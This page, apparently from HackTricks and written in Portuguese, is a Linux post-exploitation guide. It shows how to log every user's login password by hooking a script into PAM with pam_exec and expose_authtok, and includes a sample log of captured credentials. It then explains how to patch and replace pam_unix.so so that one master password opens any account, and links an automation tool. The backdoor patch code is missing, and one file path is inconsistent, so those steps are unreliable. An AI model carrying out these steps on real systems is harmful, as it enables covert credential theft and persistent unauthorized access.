6.9 KiB
Pós-Exploração do Linux
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
-
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
-
Adquira o swag oficial do PEASS & HackTricks
-
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
-
Compartilhe seus truques de hacking enviando PRs para o repositório hacktricks e hacktricks-cloud repo.
Sniffing de senhas de login com PAM
Vamos configurar um módulo PAM para registrar cada senha que cada usuário usa para fazer login. Se você não sabe o que é PAM, confira:
{% content-ref url="pam-pluggable-authentication-modules.md" %} pam-pluggable-authentication-modules.md {% endcontent-ref %}
Primeiro, criamos um script bash que será invocado sempre que ocorrer uma nova autenticação.
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
As variáveis são específicas do PAM e estarão disponíveis por meio do módulo pam_exec.so
.
Aqui está o significado das variáveis:
- $PAM_USER: O nome de usuário que foi inserido.
- $PAM_RHOST: O host remoto (tipicamente o endereço IP)
- $(cat -): Isso lê
stdin
, e conterá a senha que o script captura - Os resultados são redirecionados para um arquivo de log em
/var/log/toomanysecrets.log
Para impedir que todos os usuários leiam o arquivo, considere pré-criá-lo e executar chmod
, por exemplo:
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
Em seguida, o arquivo de configuração do PAM precisa ser atualizado para que o módulo pam_exec
seja usado para invocar o script.
Existem vários arquivos de configuração localizados em /etc/pam.d/
, e escolhemos o common-auth
.
sudo nano /etc/pam.d/common-auth
Na parte inferior do arquivo, adicione o seguinte módulo de autenticação:
auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
As opções têm o seguinte significado:
- optional: A autenticação não deve falhar se houver um erro (não é uma etapa obrigatória)
- pam_exec.so: Este é o módulo PAM que pode invocar scripts arbitrários
- expose_authtok: Este é o truque que permite ler a senha via
stdin
- quiet: Não mostre nenhum erro ao usuário (se algo não funcionar)
- O último argumento é o script shell que foi criado anteriormente
Finalmente, torne o arquivo executável:
sudo chmod 700 /usr/local/bin/toomanysecrets.sh
Agora, vamos experimentar e fazer ssh de outra máquina ou fazer login localmente.
E então olhe para o arquivo de log:
$ sudo cat /var/log/toomanysecrets.log
Sun Jun 26 23:36:37 PDT 2022 tom, Trustno1!, From: 192.168.1.149
Sun Jun 26 23:37:53 PDT 2022 tom, Trustno1!, From:
Sun Jun 26 23:39:12 PDT 2022 tom, Trustno1!, From: 192.168.1.149
Backdooring PAM
Vamos para as fontes do PAM (depende da sua distribuição, pegue o mesmo número de versão que a sua...) e procure em torno das linhas 170/180 no arquivo pam_unix_auth.c:
vi modules/pam_unix/pam_unix_auth.c
Vamos mudar isso para:
Isso permitirá que qualquer usuário que use a senha "0xMitsurugi" faça login.
Recompile o pam_unix_auth.c
e substitua o arquivo pam_unix.so:
make
sudo cp \
/home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/pam_unix.so \
/lib/x86_64-linux-gnu/security/
{% hint style="info" %} Você pode automatizar esse processo com https://github.com/zephrax/linux-pam-backdoor {% endhint %}
Referências
- https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/
- https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
-
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
-
Adquira o swag oficial do PEASS & HackTricks
-
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
-
Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e hacktricks-cloud repo.